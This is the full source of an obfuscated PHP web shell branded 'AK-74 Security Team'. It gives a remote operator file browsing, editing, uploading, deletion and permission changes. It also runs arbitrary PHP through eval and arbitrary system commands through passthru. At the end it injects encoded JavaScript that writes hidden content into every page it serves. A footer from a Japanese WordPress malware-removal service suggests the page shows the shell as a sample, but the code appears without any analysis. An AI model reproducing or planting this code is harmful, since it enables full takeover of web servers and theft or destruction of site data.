$bcaxbgujhqyk = "content";
$GLOBALS["kqhombvoisgz"] = "xshell";
$GLOBALS["nwkrhqdzrcw"] = "res";
$GLOBALS["fzszjgc"] = "info";
$GLOBALS["fvyvgcirdxx"] = "path";
$GLOBALS["pgctubg"] = "perms";
$GLOBALS["kmdyudoev"] = "sec";
$GLOBALS["xcglkyuot"] = "dir";
$GLOBALS["hoyoqwd"] = "mas";
$GLOBALS["vtpgxuvxbi"] = "file";
$osezbewemuin = "content";
$GLOBALS["dwjodtpv"] = "handle";
$GLOBALS["wdyvqrczdgu"] = "i";
error_reporting(0);
$dbmeztzpbjd = "content";
@set_time_limit(0);
$yuabcquera = "xshell";
$fridqpc = "SERVER_";
session_start();
$wupyapffrye = "content";
$xshell = $SERVER_["PHP_SELF"];
class shell
{
function getfiles()
{
$GLOBALS["qzgebdlknl"] = "mas";
$qeosfvpx = "mas";
$mas = array();
$i = 0;
if ($handle = opendir($_SESSION["currentdir"])) {
$GLOBALS["qmdtpcoeduj"] = "handle";
$GLOBALS["zoaynvkz"] = "file";
while (false !== ($file = readdir($handle))) {
if ($file != "..") {
if (!is_dir($_SESSION["currentdir"] . "/" . $file)) {
$GLOBALS["sntlhgwvrnz"] = "file";
$GLOBALS["mpyjuxikn"] = "i";
$iwkugxydfbd = "file";
$qjtflnyw = "mas";
$nqlxlnj = "i";
$zibzmuilrsk = "i";
$mas[$i]["filename"] = $file;
$GLOBALS["nhauqglig"] = "mas";
$vpezessuwf = "i";
$mas[$i]["filesize"] = filesize($_SESSION["currentdir"] . "/" . $file);
$mas[$i]["lastmod"] = date("H.i/d.m.Y", filemtime($_SESSION["currentdir"] . "/" . $file));
$i++;
}
}
}
closedir($handle);
}
return $mas;
}
function getdirs()
{
$ovnbdybfxfn = "mas";
$GLOBALS["mscjpo"] = "mas";
$mas = array();
if ($handle = opendir($_SESSION["currentdir"])) {
$GLOBALS["hobugedqduo"] = "dir";
$GLOBALS["xwlfufyf"] = "handle";
while (false !== ($dir = readdir($handle))) {
$GLOBALS["iebmlxxk"] = "dir";
$qiwjehuaq = "dir";
$ulkfkgvahbq = "mas";
if ($dir != "." && is_dir($_SESSION["currentdir"] . "/" . $dir)) {
$mas[] = $dir;
}
}
closedir($handle);
}
return ${$ovnbdybfxfn};
}
function geturl()
{
if ($_SESSION["currentdir"] . "/" == $_SERVER["DOCUMENT_ROOT"]) {
return "/";
}
if (strpos($_SESSION["currentdir"], str_replace("\\", "/", $_SERVER["DOCUMENT_ROOT"])) === false) {
return "";
}
return str_replace($_SERVER["DOCUMENT_ROOT"], "", $_SESSION["currentdir"] . "/");
}
function removefile()
{
if (file_exists($_GET["file"])) {
chmod($_GET["file"], 0777);
if (unlink($_GET["file"])) {
return "File deleted!";
} else {
return "File deleted!";
}
} else {
return "File not found!";
}
}
function removedir()
{
chmod($_GET["dir"], 0777);
if (rmdir($_GET["dir"])) {
return "Directory deleted!";
} else {
return "Directory not found!";
}
}
function getmicrotime()
{
$GLOBALS["azoxuqxbstyx"] = "sec";
$nyzhvmuivi = "usec";
$GLOBALS["gpoxftmel"] = "usec";
list($usec, $sec) = explode(" ", microtime());
return (double) $usec + (double) $sec;
}
function getpermission($path)
{
$xienitv = "info";
$pmibkwbh = "info";
$qusckboendqg = "info";
$umyijesr = "info";
$sxhrms = "info";
$tynbdsso = "info";
$perms = fileperms($path);
$tyfxbbfd = "perms";
$qelozowxyjq = "perms";
$wuyjuf = "perms";
$qgfxtbdfnruf = "perms";
$siebgehypj = "info";
$pkgutlld = "perms";
$GLOBALS["uchwntfz"] = "info";
$GLOBALS["jckaac"] = "perms";
if (($perms & 0xc000) == 0xc000) {
$info = "s";
} elseif (($perms & 0xa000) == 0xa000) {
$info = "l";
} elseif (($perms & 0x8000) == 0x8000) {
$info = "-";
} elseif (($perms & 0x6000) == 0x6000) {
$info = "b";
} elseif (($perms & 0x4000) == 0x4000) {
$info = "d";
} elseif (($perms & 0x2000) == 0x2000) {
$info = "c";
} elseif (($perms & 0x1000) == 0x1000) {
$info = "p";
} else {
$info = "u";
}
$info .= $perms & 0x100 ? "r" : "-";
$info .= $perms & 0x80 ? "w" : "-";
$info .= $perms & 0x40 ? $perms & 0x800 ? "s" : "x" : ($perms & 0x800 ? "S" : "-");
${$qusckboendqg} .= $perms & 0x20 ? "r" : "-";
$fctqxhk = "info";
$info .= ${$tyfxbbfd} & 0x10 ? "w" : "-";
$info .= $perms & 0x8 ? $perms & 0x400 ? "s" : "x" : ($perms & 0x400 ? "S" : "-");
$GLOBALS["xqayvij"] = "perms";
$info .= $perms & 0x4 ? "r" : "-";
${$umyijesr} .= $perms & 0x2 ? "w" : "-";
${$tynbdsso} .= $perms & 0x1 ? $perms & 0x200 ? "t" : "x" : ($perms & 0x200 ? "T" : "-");
return ${$fctqxhk};
}
function getpermissionarray($path)
{
$iaorpkyboh = "res";
$GLOBALS["ffvutedscs"] = "perms";
$res = array();
$GLOBALS["mospvgr"] = "path";
$perms = fileperms($path);
$GLOBALS["secvlqatfohv"] = "perms";
$GLOBALS["bzngcqtouq"] = "perms";
$GLOBALS["aboxvtoyg"] = "perms";
$filvvij = "perms";
$GLOBALS["woyxpuac"] = "res";
$GLOBALS["mdbgzpglccyj"] = "perms";
$ccbjnaxobblr = "res";
$otymmkoxf = "res";
$fbhqupebtq = "res";
$GLOBALS["vdddnl"] = "res";
$gkufmuhelf = "res";
if (($perms & 0xc000) == 0xc000) {
$res[] = "s";
} elseif (($perms & 0xa000) == 0xa000) {
$res[] = "l";
} elseif (($perms & 0x8000) == 0x8000) {
$res[] = "-";
} elseif (($perms & 0x6000) == 0x6000) {
$res[] = "b";
} elseif (($perms & 0x4000) == 0x4000) {
$res[] = "d";
} elseif (($perms & 0x2000) == 0x2000) {
$res[] = "c";
} elseif (($perms & 0x1000) == 0x1000) {
$res[] = "p";
} else {
$res[] = "u";
}
$GLOBALS["nfmqqbwyhr"] = "perms";
$res[] = $perms & 0x100 ? "r" : "-";
$GLOBALS["rmhkov"] = "res";
$res[] = $perms & 0x80 ? "w" : "-";
$res[] = $perms & 0x40 ? $perms & 0x800 ? "s" : "x" : ($perms & 0x800 ? "S" : "-");
$res[] = $perms & 0x20 ? "r" : "-";
$res[] = $perms & 0x10 ? "w" : "-";
${$fbhqupebtq}[] = $perms & 0x8 ? ${$filvvij} & 0x400 ? "s" : "x" : ($perms & 0x400 ? "S" : "-");
$GLOBALS["gxyvyqrjw"] = "perms";
${$otymmkoxf}[] = $perms & 0x4 ? "r" : "-";
$eyjzgfr = "perms";
$res[] = $perms & 0x2 ? "w" : "-";
${$gkufmuhelf}[] = $perms & 0x1 ? $perms & 0x200 ? "t" : "x" : ($perms & 0x200 ? "T" : "-");
return ${$iaorpkyboh};
}
function outputhead()
{
$yeyubpcd = "res";
$res = "";
$res = "<html><head><title>AK-74 Security Team Web Shell</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\"></head>\n<body>\n<STYLE>\nA:link {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:active {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:visited {\n\tCOLOR: #4d6d91; TEXT-DECORATION: underline\n}\nA:hover {\n\tCOLOR: #C10000; TEXT-DECORATION: underline\n}\nTD {\n\tFONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica\n}\nBODY {\n\tFONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc; \n}\n</STYLE>\n<div align=\"center\"><table border=1 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 2px solid\">\n <tr>\n <td colspan=7 align=\"center\">\n <b><font color=#830000 size=4>.:: :[ AK-74 Security Team Web-shell ]: \n::.</font></b>\n </td>\n </tr>";
return $res;
}
function outputmenu()
{
$eblbmi = "xshell";
$GLOBALS["omlmyuabmc"] = "res";
$jrizoflsr = "xshell";
$GLOBALS["kzvefdrkoqf"] = "res";
$res = "";
$txbsfjnhvi = "xshell";
$res .= "<tr>\n <td colspan=7 align=\"center\">\n <table border=0 cellspacing=0 cellpadding=0>\n <tr align=\"center\">\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=info\">General information</a>\n\t </td>\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=filemanager\">File manager</a>\n\t </td>\n\t <td width=80>\n\t <a href=\"" . $xshell . "?act=phpinfo\" target=\"_blank\">phpinfo()</a>\n\t </td>\n\t <td width=110>\n\t <a href=\"" . $xshell . "?act=execute\">Run PHP</a>\n\t </td>\n\t <td width=150>\n\t <a href=\"" . $xshell . "?act=exesys\">Execute the command</a>\n\t </td>\n </tr>\n </table>\n </td>\n </tr>";
return $res;
}
function outputdown()
{
$res = "";
$GLOBALS["srzeskty"] = "res";
$res = "</table></div></body></html>";
return $res;
}
function outputfilemanager()
{
$GLOBALS["udmmztjca"] = "xshell";
$GLOBALS["ychruqucrf"] = "xshell";
$powlcxkoeay = "files";
$shvztfinhxe = "dirs";
$ckrwmyieozcl = "res";
$GLOBALS["vmuyoysyoe"] = "res";
$GLOBALS["orpfxw"] = "res";
$GLOBALS["tuwswjh"] = "res";
$GLOBALS["acmzbxffk"] = "res";
$res = "";
$GLOBALS["vdtvfpbhyru"] = "number";
$uxuysqwhok = "files";
$number = 0;
$GLOBALS["sejtvw"] = "dirs";
$qflffdcxsrx = "i";
$dirs = $this->getdirs();
$files = $this->getfiles();
$GLOBALS["asxszifet"] = "i";
sort($dirs);
sort($files);
$res .= "\n <tr>\n <td colspan=7 align=\"center\">\n <font color=#830000> The current directory:</font><b><font color=#830000>" . $_SESSION["currentdir"] . "</font></b>\n </td>\n </tr>\n <tr align=\"center\">\n <td width=30>\n \n </td>\n <td width=330>\n \n </td>\n <td width=80><font color=#830000>,</font> <b><font color=#830000>byte</font></b>\n \n </td>\n <td width=120><font color=#830000>\n Recent change\n </font>\n </td>\n <td width=80 align=\"center\"><font color=#830000>Access right</font>\n \n </td>\n <td width=30>\n \n </td>\n <td width=30>\n \n </td>\n </tr>";
$kshyqqibce = "i";
$hjbbitpe = "res";
$GLOBALS["wyqypgtjmi"] = "i";
for ($i = 0; ${$qflffdcxsrx} < count(${$shvztfinhxe}); $i++) {
$GLOBALS["vapieoe"] = "res";
$wokhmi = "xshell";
$GLOBALS["uvckfgaxtwdw"] = "res";
$kwqcswqlscsg = "i";
$GLOBALS["wjjxsx"] = "xshell";
$GLOBALS["bbrtstbve"] = "dirs";
$GLOBALS["jeyjcbtlodsa"] = "dirs";
$GLOBALS["ywnqtawj"] = "i";
$GLOBALS["fxthzy"] = "dirs";
$res .= "<tr><td><b><font color=#830000>" . ++$number . "</font></b></td><td><b><a href=\"" . $xshell . "?act=filemanager&dir=" . $dirs[$i] . "\">" . $dirs[$i] . "</a></b></td><td> </td><td> </td><td>";
$res .= "<a href=\"" . $xshell . "?act=chmod&file=" . $_SESSION["currentdir"] . "/" . $dirs[$i] . "\">" . $this->getpermission($_SESSION["currentdir"] . "/" . $dirs[$i]) . "</a>";
$res .= "</td><td> </td><td><a href=\"" . $xshell . "?act=filemanager&act3=del&dir=" . $_SESSION["currentdir"] . "/" . $dirs[$i] . "\">delete</a></td></tr>";
}
for (${$kshyqqibce} = 0; $i < count($files); $i++) {
$GLOBALS["gkyyblyqymf"] = "i";
$fwvwil = "files";
$vdxzvdus = "res";
$gruvymtvqist = "xshell";
$GLOBALS["qwtxsjlqhhf"] = "files";
$evvwgjhmulxe = "files";
$GLOBALS["tefzqpvhph"] = "files";
$GLOBALS["omvsytrtatv"] = "i";
$GLOBALS["ypsmanoevl"] = "i";
$wpdhhfskcteg = "i";
$ihduysxmqju = "res";
$GLOBALS["tkghkgf"] = "res";
$res .= "<tr><td><b><font color=#830000>" . ++$number . "</font></b></td>";
$res .= "<td><a href=\"" . $xshell . "?act=down&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">" . $files[$i]["filename"] . "</a></td>";
$res .= "<td> " . $files[$i]["filesize"] . "</td>";
$khftnbmpvvs = "xshell";
$res .= "<td align=\"center\">" . $files[$i]["lastmod"] . "</td>";
$res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=chmod&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">" . $this->getpermission($_SESSION["currentdir"] . "/" . $files[$i]["filename"]) . "</a></td>";
$tomphosfc = "res";
$res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=edit&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">edit</a></td>";
$res .= "<td align=\"center\"><a href=\"" . $xshell . "?act=filemanager&act2=del&file=" . $_SESSION["currentdir"] . "/" . $files[$i]["filename"] . "\">delete</a></td></tr>";
}
${$ckrwmyieozcl} .= "</table><br>";
$res .= "<table border=0 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 2px solid\">";
$pykgqvz = "res";
$res .= "<tr><td align=center><form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"mkdir\"><b><font color=#830000> :</b></font> </td><td><input type=\"text\" name=\"dircreate\"><input type=\"submit\" value=\"\"></form></td></tr>";
$res .= "<tr><td align=center><form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"createfile\"><b><font color=#830000> :</b></font></td><td> <input type=\"text\" name=\"filecreate\"><input type=\"submit\" value=\"\"></form></td></tr>";
$res .= "<tr><td align=center><form enctype=\"multipart/form-data\" action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"uploadfile\"><b><font color=#830000> :</font></b></td><td><input type=\"file\" name=\"filename\" size=\"23\"> <b><font color=#830000> </b></font></td><td> <input type=\"text\" name=\"filename2\"><input type=\"submit\" value=\"\"></form></td></tr>";
$res .= "<table border=0 width=\"700\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">";
${$hjbbitpe} .= "<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>";
return ${$pykgqvz};
}
function outputinfo()
{
$vbgcqwfncvvz = "res";
$myhjur = "res";
$res = "";
$res .= "<tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>General information about the server</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"left\"><br>\n <ol>\n <b><font color=#830000>1. OS - </font></b><font color=#830000>" . php_uname() . "</font><br><br>\n <b><font color=#830000>2. PHP - </font></b><font color=#830000>" . phpversion() . "</font><br><br>\n <b><font color=#830000>3.</font></b><font color=#830000> <b><font color=#830000>User</b></font> - " . get_current_user() . " <b><font color=#830000>|| User ID</font></b> - " . getmyuid() . " <b><font color=#830000>|| Group ID</b></font> - " . getmygid() . "</font><br><br>\n <b><font color=#830000>4. Server Software - </font></b><font color=#830000>" . getenv("SERVER_SOFTWARE") . "</font><br><br>\n <b><font color=#830000>5. Request Method - </font></b><font color=#830000>" . getenv("REQUEST_METHOD") . "</font><br><br>\n <b><font color=#830000>6. Server IP - </font></b><font color=#830000>" . getenv("SERVER_ADDR") . "</font><br><br>\n <b><font color=#830000>7. Your IP - </font></b><font color=#830000>" . getenv("REMOTE_ADDR") . "</font><br><br>\n\t<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>" . getenv("HTTP_X_FORWARDED_FOR") . "</font><br><br>\n</td>\n </tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>";
return $res;
}
function chmodform($file)
{
$istixexbyxa = "file";
$nrugpeehr = "res";
$yvdvvaai = "i";
$GLOBALS["nwfedck"] = "perms";
$fewqjextf = "file";
$perms = $this->getpermissionarray($file);
$GLOBALS["ynokejbtuh"] = "perms";
$GLOBALS["ngqiunigukfh"] = "perms";
$uizdfjdf = "res";
$hammouvne = "i";
$GLOBALS["ykexebt"] = "res";
$GLOBALS["pefltgfgwzb"] = "i";
$res = "";
$res .= "<form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"chmod\">" . "<input type=\"hidden\" name=\"file\" value=\"" . $file . "\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Changing access permissions</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0>";
$ftrxmefkqxh = "i";
$res .= "<tr align=\"center\"><td> </td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td></tr>";
$GLOBALS["yggjmwlv"] = "res";
$res .= "<tr><td><input type=\"hidden\" name=\"perms0\" value=\"" . $perms[0] . "\">" . $perms[0] . "</td>";
for ($i = 1; $i <= 9; $i++) {
$res .= "<td><input type=\"checkbox\" name=\"perms" . ${$ftrxmefkqxh} . "\"" . ($perms[${$yvdvvaai}] != "-" ? " checked" : "") . "></td>";
}
$res .= "</tr><tr><td colspan=10 align=\"right\"><input type=\"submit\" value=\"Save\"></td></tr>";
$res .= "</table></td></tr></form>";
return $res;
}
function editfileform($file)
{
$rwaotihpr = "fp";
$GLOBALS["wcqoifupsbh"] = "file";
$yyvjrmlhyubj = "fp";
$fp = fopen($file, "r");
if (!$fp) {
return " ";
}
$res = "";
$zeleyib = "res";
$hjrxrmu = "res";
$GLOBALS["ryysceaq"] = "res";
$GLOBALS["yjdeuf"] = "res";
$GLOBALS["kwyxxau"] = "file";
$res .= "<form action=\"" . $xshell . "?act=filemanager\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"editfile\">" . "<input type=\"hidden\" name=\"file\" value=\"" . $file . "\"><tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Edit the file</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0>";
$res .= "<tr><td><textarea rows=25 cols=100 name=\"filecontent\">" . htmlspecialchars(fread(${$rwaotihpr}, filesize($file))) . "</textarea></td></tr>";
$res .= "<tr><td align=\"right\"><b><font color=#830000>Rename:</font></b> <INPUT TYPE=TEXT NAME=rename size=100 maxlength=9999999 value=" . $file . "> - <input type=\"submit\" value=\"Edit\"></td></tr>";
$res .= "</table></td></tr></form>";
fclose(${$yyvjrmlhyubj});
return $res;
}
function executeform()
{
$GLOBALS["gbbivqermof"] = "xshell";
$GLOBALS["jcoxegkjqmx"] = "res";
$res = "";
$res .= "<form action=\"" . $xshell . "?act=execute\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"execute\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Executing PHP code<br> Opening and closing PHP code ( <? ?> ) no need to write!</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=20 cols=80 name=\"phpcode\">";
$res .= "</textarea></td></tr><tr><td align=\"right\"><input type=\"submit\" value=\"\"></td></tr></table></td></tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>";
return $res;
}
function execute()
{
echo "<hr>";
echo "<pre>";
eval(stripslashes($_POST["phpcode"]));
echo "</pre>";
echo "<hr>";
}
function exesysform()
{
$husxnjellv = "res";
$res = "";
$GLOBALS["lmwlmrqw"] = "res";
$GLOBALS["ubwopher"] = "res";
$res .= "<form action=\"" . $xshell . "?act=exesys\" method=\"post\"><input type=\"hidden\" name=\"action\" value=\"exesys\">\n <tr>\n <td align=\"center\" colspan=7>\n <b><font color=#83000>Execute system commands!</font></b>\n </td>\n </tr>\n <tr>\n <td colspan=7 align=\"center\">\n <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=5 cols=80 name=\"cmmd\">";
$res .= "</textarea></td></tr><tr><td align=\"right\"><input type=\"submit\" value=\"Perform\"></td></tr></table></td></tr>\n <table border=0 width=\"555\" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style=\"border: #C10000 1px solid\">\n<tr><td align=center><b><font color=#83000>Copyright </font><a href=\"https://www.r57.gen.tr/\" title=\"r57.gen.tr\">r57.gen.tr</a> - <a href=\"http://ak74-team.net\" target=\"_blank\">AK-74 Security Team<a> <font color=#83000>2005 - " . date("Y") . "</font></b></td></tr>";
return $res;
}
function exesys()
{
$GLOBALS["yvcpokfc"] = "result";
echo "<hr>";
echo "<pre>";
$result = passthru($_POST["cmmd"]);
echo "</pre>";
echo "<hr>";
}
function editfile($file)
{
if (!empty($_POST["rename"])) {
rename($_POST["file"], $_POST["rename"]);
}
$fp = fopen($_POST["rename"], "w");
if (!$fp) {
return 0;
}
fwrite($fp, stripslashes($_POST["filecontent"]));
fclose($fp);
return 1;
}
function chmodfile($file)
{
$tpmdfbgb = "res";
$ipjaivcsdnlk = "res";
$sgwdghqlhfy = "res";
$GLOBALS["pufgvr"] = "res";
$fcpofletrcs = "res";
$GLOBALS["ikiudyniptdh"] = "res";
$GLOBALS["lzykxw"] = "res";
$hlfwyxuk = "res";
$feixofkogs = "res";
$tulbauxmvcdt = "res";
$txyrsfflh = "res";
$res = 0;
$gorewqwudp = "res";
switch ($_POST["perms0"]) {
case "s":
$res |= 0xc000;
break;
case "l":
$res = ${$gorewqwudp} | 0xa000;
break;
case "-":
${$hlfwyxuk} |= 0x8000;
break;
case "b":
$res |= 0x6000;
break;
case "d":
$res |= 0x4000;
break;
case "c":
$res |= 0x2000;
break;
case "p":
$res |= 0x1000;
break;
case "u":
break;
}
$GLOBALS["xeomnnbyudw"] = "res";
if (isset($_POST["perms1"])) {
$res |= 0x100;
}
if (isset($_POST["perms2"])) {
$res = ${$tpmdfbgb} | 0x80;
}
if (isset($_POST["perms3"])) {
$res = ${$txyrsfflh} | 0x40;
}
if (isset($_POST["perms4"])) {
${$feixofkogs} = $res | 0x20;
}
if (isset($_POST["perms5"])) {
$res |= 0x10;
}
if (isset($_POST["perms6"])) {
$res = ${$tulbauxmvcdt} | 0x8;
}
if (isset($_POST["perms7"])) {
$res = ${$fcpofletrcs} | 0x4;
}
if (isset($_POST["perms8"])) {
$res |= 0x2;
}
if (isset($_POST["perms9"])) {
$res |= 0x1;
}
echo substr(sprintf("%o", $res), 4);
return chmod($file, intval(substr(sprintf("%o", $res), 4), 8));
}
function downloadfile($file)
{
$jehqknntr = "file";
header("Content-Type: application/octet-stream");
header("Content-Length: " . filesize($file));
header("Content-Disposition: attachment; filename={$file}");
readfile($file);
die;
}
function createdir()
{
if (!empty($_POST["dircreate"])) {
if (mkdir($_SESSION["currentdir"] . "/" . $_POST["dircreate"])) {
return "Directory created!";
}
}
return "Error creating directory";
}
function createfile()
{
if (!empty($_POST["filecreate"])) {
$GLOBALS["lwhsyzdtepf"] = "fp";
if (file_exists($_SESSION["currentdir"] . "/" . $_POST["filecreate"])) {
return " ";
}
$fp = fopen($_SESSION["currentdir"] . "/" . $_POST["filecreate"], "w");
if ($fp) {
$nwmcqdkwk = "fp";
fclose($fp);
return " !";
}
}
return "Error creating file";
}
function uploadfile()
{
if ($_FILES["filename"]["error"] != 0) {
return "121212";
}
$_POST["filename2"] = trim($_POST["filename2"]);
if (empty($_POST["filename2"])) {
$_POST["filename2"] = $_FILES["filename"]["name"];
}
if (!copy($_FILES["filename"]["tmp_name"], $_SESSION["currentdir"] . "/" . $_POST["filename2"])) {
if (!move_uploaded_file($_FILES["filename"]["tmp_name"], $_SESSION["currentdir"] . "/" . $_POST["filename2"])) {
return "File download failed...";
}
}
return "The file was uploaded successfully!";
}
}
$shell = new shell();
$timestart = $shell->getmicrotime();
$content = "";
if (!isset($_SESSION["currentdir"])) {
$_SESSION["currentdir"] = str_replace("\\", "/", $_SERVER["DOCUMENT_ROOT"]);
}
if (isset($_GET["dir"])) {
if (opendir(realpath($_SESSION["currentdir"] . "/" . $_GET["dir"]))) {
$_SESSION["currentdir"] = realpath($_SESSION["currentdir"] . "/" . $_GET["dir"]);
}
Header("Location: {$xshell}?act=filemanager");
}
$_SESSION["currentdir"] = str_replace("\\", "/", $_SESSION["currentdir"]);
$bxmeyfko = "content";
if (substr($_SESSION["currentdir"], 1, 1) == "/") {
$_SESSION["currentdir"] = substr($_SESSION["currentdir"], 0, 1);
}
$GLOBALS["lvsmiwfpysj"] = "content";
switch ($_POST["action"]) {
case "chmod":
if ($shell->chmodfile($_POST["file"])) {
${$GLOBALS["iknpldrpigo"]} .= "The change was successful";
}
break;
case "editfile":
if ($shell->editfile($_POST["file"])) {
${$wupyapffrye} .= "The edit was successful";
}
break;
case "execute":
$shell->execute();
break;
case "exesys":
$shell->exesys();
break;
case "mkdir":
${$GLOBALS["iknpldrpigo"]} .= $shell->createdir();
break;
case "createfile":
${$dbmeztzpbjd} .= $shell->createfile();
break;
case "uploadfile":
${$GLOBALS["iknpldrpigo"]} .= $shell->uploadfile();
break;
}
${$GLOBALS["iknpldrpigo"]} .= $shell->outputhead();
${$GLOBALS["iknpldrpigo"]} .= $shell->outputmenu();
switch ($_GET["act"]) {
case "edit":
${$GLOBALS["gyyylpy"]} .= $shell->editfileform($_GET["file"]);
break;
case "chmod":
${$GLOBALS["lvsmiwfpysj"]} .= $shell->chmodform($_GET["file"]);
break;
case "down":
${$GLOBALS["iknpldrpigo"]} .= $shell->downloadfile($_GET["file"]);
break;
case "filemanager":
if ($_GET["act2"] == "del") {
${$bxmeyfko} .= $shell->removefile();
}
${$GLOBALS["iknpldrpigo"]} .= $shell->outputfilemanager();
if ($_GET["act3"] == "del") {
${$hilzzmbb} .= $shell->removedir();
}
break;
case "phpinfo":
phpinfo();
die;
case "info":
${$bcaxbgujhqyk} .= $shell->outputinfo();
break;
case "execute":
${$GLOBALS["iknpldrpigo"]} .= $shell->executeform();
break;
case "exesys":
${$GLOBALS["iknpldrpigo"]} .= $shell->exesysform();
break;
}
${$GLOBALS["iknpldrpigo"]} .= $shell->outputdown();
echo ${$osezbewemuin};
echo "<center>Generation time: " . ($shell->getmicrotime() - ${$GLOBALS["olmwrdqid"]}) . "</center>";
echo "<script type=\"text/javascript\">\n<!-- \neval(unescape('%66%75%6e%63%74%69%6f%6e%20%70%34%32%64%38%63%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%32%31%30%38%35%35%37%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%38%35%36%31%36%32%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%37%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));\neval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%70%34%32%64%38%63%28%27') + '%30%6b%5b%62%63%6e%6e%11%69%6d%5d%30%19%64%6a%6a%60%32%2f%2b%78%75%76%26%6d%2c%35%20%67%57%66%20%6e%63%2d%74%5b%75%5e%67%74%2f%55%63%74%24%6b%69%1d%36%33%2a%69%5b%6c%6b%68%6a%3412108557%35%37%37%39%31%37%33' + unescape('%27%29%29%3b'));\n// -->\n</script>\n";■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.